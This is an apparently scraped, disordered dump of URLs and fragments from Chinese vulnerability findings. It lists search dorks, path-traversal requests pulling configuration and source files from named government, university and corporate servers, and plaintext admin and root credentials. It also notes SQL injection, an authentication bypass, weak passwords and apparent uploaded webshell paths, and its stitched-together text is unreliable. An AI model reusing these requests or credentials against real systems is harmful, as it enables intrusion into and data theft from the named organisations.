http://unhr.com.cn/showxyzp.asp?id=82 http://sa.bupt.edu.cn/news/newscontent.aspx?newsid=485 http://218.245.6.176/pages/LoginApp/app_m.html http://www.lpai.com.cn/website.rar inurl:managerOneGgxxfb.action http://ecard.sdu.edu.cn/ggxxfb.action?lmid=53d6b69231bd74d70132149514b60001 http://ecard.sdu.edu.cn/xxsearch.action?lmid=53d6b69231bd74d70132149514b60001 http://ecard.sdu.edu.cn/managerOneGgxxfb.action?fbxxid=53d6b6923cff8518 http://www.sqlmap.org http://star.rayli.com.cn/web.config http://star.rayli.com.cn/bbs http://adsite3.rayli.com.cn/common_vote/common_savevoteinfo.php http://miyou.beauty.rayli.com.cn/fls/?s=37 http://star.rayli.com.cn/services/service.php?m=u&a=album&width=190&home_id=12611309 http://www.onlylady.com/files/eventapi.php?c=SimpleVote&a=getOscars&options=201405190001 inurl:/ArticleContent.jsp?id= http://www.zscz.gov.cn/ArticleContent.jsp?id=4567 http://www.sycz.gov.cn/ArticleContent.jsp?id=2352 http://wwwoth.qhmc.edu.cn/cjxy/ArticleContent.jsp?ID=202 http://lclh.gszy.edu.cn/ArticleContent.jsp?ClassID=4&ID=86 http://www.xiao5u.com/ http://www.xiao5u.com/Product/Survey.html http://www.bmga.gov.cn/diaocha/ http://www.jhdj.gov.cn/wjdc/ http://www.kpjsedu.cn/Survey/index.asp http://oa.jys.ykedu.net/xs2/ http://www.dbjxxx.net/survey/ http://www.ccatcpa.com/toupiao/ www.Xiao5u.Com http://www.cclinux.com/index/project.asp http://121.12.117.111:9231/v2014-admin/ http://www.agrij.com/) inurl:login_form.jsp http://202.99.207.13:8081/finance11n/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://124.164.240.217:8080/finance03/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://111.12.148.194:7005/finance_qhld/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://61.185.74.147:8080/finance67/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://nat.nat123.net:11158/finance/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://www.cldwcwgk.gov.cn:8083/finance80/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://116.255.135.35:8082/finance_glx/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://221.131.81.143:7001/finance_oracle/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://202.99.207.13:8081/finance11n/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://124.164.240.217:8080/finance03/servlet/downloadfile?filename=/../../../conf/web.xml&userid=/ http://111.12.148.194:7005/finance_qhld/servlet/downloadfile?filename=/../WEB-INF/web_ODBC.xml&userid=/ http://61.185.74.147:8080/finance67/servlet/downloadfile?filename=/../WEB-INF/dbBean.java&userid=/ http://www.cldwcwgk.gov.cn:8083/finance80/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://t9.tongda2000.com/ http://t9.go2oa.com:86/ http://t9.go2oa.com:86/t9/t9/core/funcs/system/act/T9SystemAct/doLoginIn.act http://feedback.uc.cn/feedback/feedback/index?instance=pc_client&pf=145 http://www.sxsrmyy.com/ss/lindex.asp http://gdl.seu.edu.cn:8080/readnews.php?newsid=32 http://gdl.seu.edu.cn:8080/jnt/jnt_grda_jnwx_read.php?id=304¤tJNTId=34 http://www.dhybzx.org) http://czt189.com/Admin/AdminLogin.aspx http://czt189.com//FileLoadImg/201407261809ASP.asp www.rar文件,很不安全!!! http://magazine.tcl.com/manager/login.aspx http://magazine.tcl.com http://222.83.30.166/ http://222.83.30.166/nps/speed/testingSpeedAction!testingSpeed.action还是root权限...~ http://121.28.35.250:8080/cms/loginAction.action http://121.28.35.250:8080/cms/loginAction.action server:/usr/local/www/jdk1.6/jre/lib/i386:/usr/local/www/jdk1.6/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib http://java.sun.com/ http://jz.smegx.com/customers/ inurl:article.php?titleId= http://www.gxlawyer.com/article.php?titleId=63 http://www.sqlmap.org www.gxlawyer.com\session http://www.xiao5u.com/ http://down.chinaz.com/soft/31094.htm http://localhost:58031/feedback.asp http://www.zkzjnu.com/feedback.asp http://219.159.230.131:9090/feedback.asp http://www.sxdtdx.edu.cn/lslyxy/feedback.asp http://www.naswsxf.com/feedback.asp http://www.yxfssl.com/feedback.asp http://jyx.hbust.com.cn/feedback.asp http://www.jyzx58.cn/feedback.asp http://www.wxhongen.com/feedback.asp http://www.jy0539.com/feedback.asp Www.Xiao5u.Com http://www.cclinux.com/index/project.asp http://121.12.117.111:9231/v2014-admin/forum/forum_list.asp?fid=6 http://newcar.xcar.com.cn/auto/index.php?r=dealerPopw/orderpost http://nx.bbn.com.cn/biz/zhs_alllist.php?zsfx_id=8&fdiqu= http://www.women.org.cn/women/searchAttachment http://www.fjwomen.org.cn/Template/fexxCatalog.jsp?currCatalogID=20070829463234 http://www.gxwomen.org.cn/vote/?id=6 http://www.hljwomen.org.cn/Polls/PollSearchList.aspx?PollCategoryID=-1&strKey= http://app.gdwomen.org.cn/fltuijian/details/music.php?mid=4 http://www.jnwomen.org.cn/pcontent.asp?id=2713 http://www.zjswomen.org.cn/all/all.php?Id=132 http://www.zjswomen.org.cn/artcount/articlecount.htm1?func=get&articleid=15324 http://www.gxgxw.gov.cn/CommonPage/ArticleSearchResults.aspx?publishDate=2014-07-01 http://www.chinaamc.com/product/selectFundInfoByHSHUO.dofundCode=008006¤tPage=0&beginDate=&endDate= http://116.228.171.46/ http://116.228.171.46/Home/Login http://sqlmap.org http://116.228.171.53:8002/ http://www.rongdaqhd.com/soft/product.html http://121.28.35.202/www/news_list.php?cat1id=2&cat2id=6 http://60.213.186.122:81/www/news_list.php?cat1id=2&cat2id=7 http://zxzj.cangzhou.gov.cn/www/news_list.php?cat1id=3&cat2id=8 http://60.10.25.13/www/news_list.php?cat1id=3&cat2id=8 http://www.bdzxzj.gov.cn/www/news_list.php?cat1id=3&cat2id=8 http://www.dzsjcj.gov.cn/www/news_list.php?cat1id=3&cat2id=21 http://221.193.194.131/www/news_list.php?cat1id=3&cat2id=8 www.shandongweb.com/ tel:10086 tel:10086 tel:10086 http://api.zj189.cn/sendmessage.php?wsdl http://api.zj189.cn/lxjkweb/index.php/Message/p?notice=1&p=3 http://www.hagaozhong.com http://218.29.79.78 http://www.hagaozhong.com/recruit/policy/Default.aspx?key=1 http://218.29.79.78/recruit/policy/Default.aspx?key=1 http://member.aili.com/note/add http://121.40.72.69:8080/logServer/user/login url:http://121.40.72.69:8080/manager/html user:admin pass:admin http://jingdian.wo116114.com/search.aspx?scname=1 http://hbsemp.unisk.cn/getSource.jsp?bq_name=1 http://emp.sh.chinaunicom.com/getSource.jsp?bq_name=1 http://61.158.142.197/getSource.jsp?bq_name=1 http://sdemp.unisk.cn//getSource.jsp?bq_name=1 http://tjemp.unisk.cn/getSource.jsp?bq_name=1 http://lnemp.unisk.cn/getSource.jsp?bq_name=1 http://nmemp.unisk.cn/getSource.jsp?bq_name=1 http://ynemp.unisk.cn/getSource.jsp?bq_name=1 http://jsuemp.unisk.cn/getSource.jsp?bq_name=1 http://sxtemp.unisk.cn/getSource.jsp?bq_name=1 http://gdemp.unisk.cn/getSource.jsp?bq_name=1 http://jlemp.unisk.cn/getSource.jsp?bq_name=1 http://hnhemp.unisk.cn/getSource.jsp?bq_name=1 http://www.js.chinaunicom.com/shop/sales/SalePhoneCtrl.do?sale_type=2&oper_flag=phone_info&goods_id=5881&phone_promotion=A&city_id=0&user_type=old http://game.nearme.com.cn/findPwdValid这个接口跑验证码 http://oauth.nearme.com.cn/oauth/XAccessTokenServlet http://cofcomag.cofco.com/cn/cn.rar http://bw.xjtu.edu.cn/119/show119.php?recid=3325 user:root password:z800926q http://www.chinarishi.gov.cn http://weixin.homeinns.com/travel/travel4.php?id=1401727901 http://bbs.dota2.com.cn/forum.php http://cache.baiducontent.com/c?m=9d78d513d99910e84fece43d495280711824d4743da7c7150fc39238923803061e3da7f9302360018b8d253415e80902e5aa7034751421c486d5d71986e5852858c97d73364dd95612a448f2945b649b67d60bb6b81990eda67584aea58283&p=9a63c11986cc41ac5cb5c7710f0e80&newp=9879ce16d9c133f708e2947d095e93231610db2151d7da110d8c&user=baidu&fm=sc&query=hCuQvVeF%2B3NJUKIVP7jZKA&qid=&p1=1 inurl:ns.php?cl=ns http://www.achang8.com/ns.php?cl=ns&nowmenuid=10012158 http://www.sqlmap.org www.achang8.com\session http://dwb.ahu.edu.cn/dwfc.asp?nClass_Id=36 http://www.xsc.ahu.edu.cn/moreNews.asp?typeid=31 http://www2.ahu.edu.cn/bwc/newdetail.php?NID=4 http://oldjjxy.ahu.edu.cn/xygk.asp?NewsID=861 http://zfgjj.km.gov.cn/website/website.do?act=download&id=2810&path=c:\Windows\win.ini&name=win.ini http://game.sports.sina.com.cn url:http://ekp.zt17.cn/ http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21 http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21 http://blog.csdn.net/bestwear1002/article/details/38221935 http://www.xiangtan.gov.cn/login.jsp http://demo.cuumall.com/ https://account.oppo.com/index.php?q=user/getbackpass&back=http%3A%2F%2Fwww.oppo.com%2F https://account.oppo.com/index.php?q=user/confirmid&type=1&sign=e9fb209c9416fb0312980c47c4537f0b http://121.199.160.233/ http://192.168.0.11/ http://172.58.14.253/ http://topic.xcar.com.cn/HONDA_ACCORD/comment/?topic_id= http://t***.taobao.com/upload/201407/0bda13c09fa040256add00fe3377ec6d.php http://123.127.67.30/ http://yjsc.ahau.edu.cn/web/infoList4.aspx?kind=01 http://qhwx.ahau.edu.cn/include/web_content.php?id=1364 http://mail.12306.cn/app/mail/login http://www.bjcz.gov.cn:9999/ly/caizheng/test/restore_content.jsp?letters_id=100634存在sql盲注 http://www.bjcz.gov.cn:9999/ly/caizheng/test就跳过了密码验证 http://www.cfsfgw.gov.cn http://www.cfsfgw.gov.cn/kqadmin/kqindex.aspx http://www.hbyl.gov.cn/upload.jsp?name=../viewnew.jsp http://www.hbyl.gov.cn/upload.jsp?name=../index.jsp http://test.crazygame.cn/v2014/forum/forum_cate_list.asp http://www.tongcard.com/embeded/login.do tongcard.com/ROOT/ jar:/opt/tomcatcom/bin/commons-logging-api.jar http://java.sun.com/ http://wanwan.sina.com.cn/smallgame/game_top.php?gid=202205&top=10&type=day http://61.185.224.16/license/license/apply/qsite_siteQuery.do http://snkj.sf.gov.cn/license/license/apply/qsite_siteQuery.do http://www.sjzxc.cn/)管理系统存在弱口令,导致所有学员信息泄露。 http://110.249.129.242/admin/login.aspx http://nx.bbn.com.cn/biz/zbfj2.php?biz_id=436&tag=1&j_id=55 www.firsthospital.cn/upload/photo/1.asp http://kconv3.vasee.com/ http://kconv3.vasee.com/.svn/entries kconv3.vasee.com/withdrawalsManage.jsp http://www.wmtj.mofcom.gov.cn/zdlx/login.html http://www.wmtj.mofcom.gov.cn/zdlx/login_loginform.html http://yfk.mofcom.gov.cn/card/page.html http://www.wmtj.mofcom.gov.cn/zdlx/pages/department/fileshare/ site:www.wmtj.mofcom.gov.cn jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/XmlSchema-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/activation-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-antlr-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-junit-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-launcher-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/antlr-2.7.6.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/asm-2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/backport-util-concurrent-3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/bcprov-jdk15-133.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/bsf-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/c3p0-0.8.5.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cglib-nodep-2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cobertura-1.8.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cofortune-framework-20120326-dist.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-beanutils-1.7.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-codec-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-collections-3.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-dbcp.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-digester-1.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-fileupload-1.2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-httpclient-3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-io-1.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-jexl-2.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-lang-2.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-logging-1.0.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-pool-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/dom4j-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/dwr-2.0.rc4a.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ehcache-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ejb3-persistence.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/emory-util-all.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ezmorph-1.0.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/freemarker-2.3.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/freemarker.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-annotations.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-commons-annotations.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-search.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-validator.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hivemind-1.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hivemind-lib-1.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/itext-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/javamail-1.3.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/javassist-3.4.ga.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-api-2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-impl-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-xjc-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxen-1.1-beta-6.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxen-1.1-beta-9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxws-api-2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jcommon-1.0.9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jdbc2_0-stdext.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jdom-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5-experimental.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5-swt.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/json-lib-2.4-jdk15.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jsr173_api-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jstl.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jta.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jtds-0.7.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/junit-3.8.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jxl.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jxls-core-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jxls-reader-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/log4j-1.2.9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-analyzers-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-core-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-highlighter-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/mysql-connector-java-3.1.7-bin.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/nekohtml-0.9.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/nekohtml.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ognl-2.7.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ojdbc14.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/opensaml-1.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/org.mortbay.jetty.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/oro-2.0.8.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/oscache-2.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/pinyin4j-2.5.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-contrib-3.2-FINAL-20081019.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-ooxml-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-ooxml-schemas-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-scratchpad-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/portlet-api-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/quartz-1.5.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saaj-api-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saaj-impl-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saxpath-1.0-FCS.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/serializer.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/slf4j-api-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/slf4j-simple-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/spring.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/standard.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/stax-api-1.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/stax-utils-20040917.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/swtgraphics2d.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-annotations-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-contrib-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-spring-1.0.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/uuid.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wsdl4j-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wss4j-1.5.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wstx-asl-3.2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/xmemcached-1.3.8.jar:/usr/local/apache-tomcat-zdlx/lib/:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-ja.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-fr.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-ha.jar:/usr/local/apache-tomcat-zdlx/lib/jasper.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-es.jar:/usr/local/apache-tomcat-zdlx/lib/catalina.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-dbcp.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-tribes.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-ant.jar:/usr/local/apache-tomcat-zdlx/lib/jsp-api.jar:/usr/local/apache-tomcat-zdlx/lib/jasper-el.jar:/usr/local/apache-tomcat-zdlx/lib/ecj-3.7.jar:/usr/local/apache-tomcat-zdlx/lib/annotations-api.jar:/usr/local/apache-tomcat-zdlx/lib/el-api.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-coyote.jar:/usr/local/apache-tomcat-zdlx/lib/servlet-api.jar:/usr/local/apache-tomcat-zdlx/bin/bootstrap.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/sunpkcs11.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/sunjce_provider.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/dnsns.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/localedata.jar http://www.hnnkyy.com/zjia/zjia-cha2.php?id=1324 http://www.taobao.com/go/app/tmall/login-api2.php.php http://www.zdvictory.com/ http://stats.add.sogou-inc.com/monitor/ http://stats.add.sogou-inc.com/inc/ http://stats.add.sogou-inc.com/src/ http://stats.add.sogou-inc.com/libs/ http://www.lqzjz.com.cn/download.jsp?path=../WEB-INF/web.xml http://www.lqzjz.com.cn/houtai/main.jsp http://www.lqzjz.com.cn/houtai/masterfujian.jsp?rowno=643 http://www.lqzjz.com.cn/houtai/uploadfujian.jsp?formid=null&rowid=643 http://www.lqzjz.com.cn/download.jsp?path=../download.jsp https://159.226.110.180/ http://192.168.100.1/xwxx/mailc.htm) http://192.168.100.1/xwxx/dhhm.mht) cyepb.gov.cn/Manage/Login.aspx http://news.uibe.edu.cn/uibenews/10_sort.php?sortid=659 http://dx.uibe.edu.cn/list_new.asp?bid=120&id=79 http://www.shangzhi.gov.cn/ http://www.shangzhi.gov.cn/women/content.php?id=116 http://www.whjz.org.cn/Foosun_Data/FS400.mdb http://115.182.53.90:8899/view/user/loginui.action http://www.***ng.com/ http://115.182.53.128:8001/default.aspx http://codetank.alloyteam.com/ http://bbs.qibosoft.com/read-forum-tid-422299-fpage-0-page-1.htm http://www.xiao5u.com/ http://www.xiao5u.com/Product/Survey.html http://exam2.timber2005.com/WEB/Answer_Info.aspx?infoid=1 http://exam2.timber2005.com/web/News_Info.aspx?infoid=1 http://exam2.timber2005.com/web/Search_List.aspx?search= http://exam2.timber2005.com/web/User_Sort_List.aspx?infoid=73 http://exam2.timber2005.com/WEB/Record_Query.aspx?typeid=1 http://exam2.timber2005.com/WEB/News_Query.aspx?typeid=3 http://exam2.timber2005.com/web/Question_Collect_Info.aspx?infoid=4 http://exam2.timber2005.com/web/Question_Collect_List.aspx?subtypeid=17&typeid=17 http://www.timber2005.com/Customer.html http://px3.timber2005.com/System/Stu_User_Regist.aspx http://sgbbs.pps.tv/forum.php http://pantosoft.com/pantoxfz http://www.hyxzfw.gov.cn/new_read.asp?id=3296 http://192.168.1.1/status.asp) http://192.168.1.1/diagnosis.asp) http://192.168.1.1/status.asp http://192.168.1.1/diagnosis.asp http://125.39.193.212:8081/ http://222.184.252.158:9080/riseapprove_web/secondPage/bur http://lib.znufe.edu.cn/Serverce.asp?id=4 http://2011auto.pps.tv/fun.html http://huati.weibo.com/?from=102&topnav=1&hot=1&wvr=5 inurL:id= http://www.xieyudatea.com http://www.xmbsl.com http://www.jinhuigk.com http://dlky.cc http://www.fzdxy.com http://www.fjchem.org http://www.hftex.com http://www.han-mei.cn http://www.leyton.cn http://www.mkky.cn http://www.biaodianxm.com http://www.fjhsws.cn http://www.zddg.com http://www.kingschina.com http://www.king-max.cn http://www.xmpac.cn http://www.xmmfc.com http://www.vacree.com http://www.fuda365.com http://www.leading-ch.com/news_show.aspx?id=14 http://www.zonghengjx.com http://www.hzgraceful.com/news_show.aspx?id=50 http://www.topstar-lace.com http://www.zhongrui.cc http://www.hz-hj.com http://www.young-instruments.com http://www.tdp777.com http://aoxingroup.com http://www.senhe.com http://lesli.com.cn http://www.hz-hj.com http://www.yudaco.cn www.renren.com/autoLogin?r=http://rrenren.com http://rrenren.com还是个黄色网站。。 http://dev.renren.com/website/?widget=followbutton http://widget.renren.com/plugin/followbutton?page_id=601848764&color=0&model=0 width:150px;height:40px http://www.ncuhome.cn/topic/shuquan/wenzhang.aspx?id=27889 http://209.116.186.246/#newwindow=1&q=intitle:%E6%8A%95%E7%A8%BF%E7%B3%BB%E7%BB%9F+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E5%8D%97%E4%BA%AC%E6%9D%B0%E8%AF%BA%E7%80%9A%E8%BD%AF%E4%BB%B6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://www.cnemergency.com/Web/Login.aspx http://dt.gwpstc.com/esp_msi/admin/login.php http://dt.scsei.org.cn/esp_msi/admin/login.php http://www.ccstzsb.com/esp_msi/admin/login.php http://xx/esp_msi/login/,后台http://xx/esp_msi/admin/ http://xx/esp_msi/jyyjd/ http://www.changyang.jcy.gov.cn/news.asp?partid=12&classid=12&id=577 http://www.tgsqjjjc.gov.cn/article.php?MsgId=92913 http://www.ahbbjjjc.gov.cn/article.php?MsgId=90652 http://www.ahsxjjjc.gov.cn/article.php?MsgId=92980 http://www.yzjjjc.gov.cn/article.php?MsgId=91080 http://www.ahtlxjjjc.gov.cn/article.php?MsgId=84285 http://www.lljcy.gov.cn/jwgk.asp?bianhao=711&Action=show http://www.hl.jcy.gov.cn/medialiebiao.aspx?ID=34&mc=%e5%9b%bd%e5%ae%b6%e7%ba%a7%e5%aa%92%e4%bd%93 http://www.hblsjjjc.gov.cn/article.php?MsgId=89375 http://www.fyydjjjc.gov.cn/article.php?MsgId=89759 http://www.fnxjw.gov.cn/article.php?MsgId=92530 http://www.whjjw.gov.cn/article.php?MsgId=92974 http://www.aqthjjjc.gov.cn/article.php?MsgId=91265 http://www.jsjcy.gov.cn/config.asp?id=6 http://www.zhijiang.jcy.gov.cn/html/pic/pic.asp?id=68&classid=46 http://www.zjhn.jcy.gov.cn/shownews.asp?id=2722 http://www.xcxfy.gov.cn/shownews.asp?id=527 http://www.fccourt.gov.cn/commonList.jsp?pxh=1&progbh=01 http://www.hbjjjc.gov.cn/article.php?MsgId=92777 http://www.cpxjw.gov.cn/shownews.asp?id=665&BigClass=%E9%93%9D%E5%9F%8E%E9%A3%8E%E7%BA%AA http://www.yiling.jcy.gov.cn/about.asp?smallclassid=184 http://snjjjc.gov.cn/gg.asp?lm_id=1076 http://www.fyyqjjjc.gov.cn/article.php?MsgId=92591 http://www.shluwan.jcy.gov.cn/news.jsp?chnlid1=137&chnlid2=138 http://www.szsjw.gov.cn/article.php?MsgId=89573 http://www.dyxjjjc.gov.cn/CommonList.asp?cid=60 http://gold.ntzj.gov.cn/page.asp?classid=1 http://shzd.hljcourt.gov.cn/zhuanti/sjt.php?sjt_id=4 http://www.hslz.gov.cn/article.php?MsgId=84768 http://jijian.enping.gov.cn/vcd/playwin.asp?id=33&downid=1 http://www.yxrmfy.gov.cn/list.php?pid=1 http://www.snjjjc.gov.cn/gg.asp?lm_id=1076 http://nti.gov.cn/Info.aspx?SID=201403181036591721 http://www.tljqjw.gov.cn/article.php?MsgId=92792 http://www.ckfy.gov.cn/download.aspx?cid=47&id=518 http://www.cqjcy.gov.cn/toupiao/show.asp?id=6 http://www.grjcy.gov.cn/appAgree.aspx?sid=0503 http://www.qbfy.gov.cn/cpws/content.asp?cpws_id=16 http://www.azqjw.gov.cn/show.asp?newsid=442 http://www.hlsjjjc.gov.cn/comment.asp?classid=1 http://www.jcy.haimen.gov.cn/view.asp?keyno=300 http://www.scxjw.gov.cn/contentview.asp?sortid=2&id=2389 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://szzjrmfy.gov.cn/news.php?typeid=159 http://www.bsfy.gov.cn/news_more.asp?lm2=155 http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.wufeng.jcy.gov.cn/lanmu.aspx?colid=1 http://www.ahjjjc.gov.cn/article.php?MsgId=92959 http://www.jyjcy.gov.cn/shownews.asp?id=41 http://408.peugeot.com.cn/show.php?cid=57 http://www1.**.zsks.cn/kscx/ http://www1.**.zsks.cn/kscx/zy/picture.gif?ksh=考生号 http://www1.**.zsks.cn/query/pz14_ksgj.jsp http://www1.**.zsks.cn/query/pz14_kscx.jsp http://rt.openssl.org/ http://125.39.193.225/ http://app.zj165.com/更无聊的尝试弱口令既然进去。里面业务至少影响浙江联通公司上千万用户。这算大隐患? php:670行 http://www.huaue.com/gzxx2014/2014711110557.htm 